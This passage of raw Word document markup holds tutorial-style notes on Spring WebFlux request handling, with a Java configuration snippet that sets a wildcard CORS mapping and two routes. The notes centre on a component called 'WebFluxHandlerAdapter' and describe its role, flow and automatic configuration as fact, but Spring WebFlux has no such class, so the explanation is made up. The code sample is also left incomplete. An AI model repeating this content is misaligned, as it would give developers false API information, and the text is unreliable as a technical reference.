        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return a response</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the form of Mono&lt;ServerResponse&gt; or Flux&lt;ServerResponse&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE2209" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive request handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is designed to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C816C"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Functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DD105" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It receives an HTTP request and delegates the request to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is usually a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handler function</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F87CEA" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> then returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive response</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono or Flux), which will be sent back to the client after being processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCFD85"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Role in WebFlux Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF688FE" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It plays a crucial role in connecting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux routing layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RouterFunctions and HandlerFunctions) to the reactive web processing flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF26286" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The handler adapter is typically invoked by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during request processing in a WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA7808"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Example Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BC470" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Client sends a request</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The HTTP request is processed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACBEE5B" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The adapter selects the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the request, processes it, and returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive response</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83E1AA" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Response sent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The response is sent back to the client in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7510F8" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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Where is WebFluxHandlerAdapter used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818EE9B"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In a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is automatically configured by Spring when you set up the WebFlux application context. You do not typically have to manually configure it, as it is set up as part of the WebFlux configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F869B87" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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lastRenderedPageBreak/>
        <w:t>Example in a WebFlux Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09878D"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In a typical WebFlux setup, the WebFluxHandlerAdapter is used implicitly as part of the Spring WebFlux infrastructure. Here’s how it fits in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1E949"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F9726"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EnableWebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D64993"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public class WebConfig implements WebFluxConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD14BCB" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245577D9"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    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE39625"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    public void addCorsMappings(CorsRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04133D"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        registry.addMapping("/**").allowedOrigins("*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62C022"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971C24D" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C37D7D1"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    @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F5094"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    public RouterFunction&lt;ServerResponse&gt; route(MyHandler handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A32DF0"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        return RouterFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53260071"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                .route(RequestPredicates.GET("/hello"), handler::handleHello)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBC7FD"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                .andRoute(RequestPredicates.GET("/goodbye"), handler::handleGoodbye);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764260E"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814A55B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18455C"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In the above code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29C832"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Router Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> routes the request to the handler functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1DDAF"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> internally manages the dispatching of these requests by invoking the appropriate handler and returning a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive response</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D27344" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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Advantages of Using WebFluxHandlerAdapter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CD8BD"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Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is optimized for handling asynchronous and non-blocking operations, which is ideal for reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3386C2"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Seamless integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It integrates the reactive WebFlux programming model into the traditional request-response cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C56784"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Routing and handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Combines the routing logic (via RouterFunction) and the request handling (via handler functions), all done reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20FEC8" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DB1199" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a core component in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, responsible for adapting the incoming HTTP requests to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive web handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WebHandler) and returning reactive responses (using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F1DB5" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It works in a non-blocking manner and is used as part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFlux dispatcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure smooth handling of asynchronous, reactive web requests.</w:t>
      </w:r>
    </w:p>
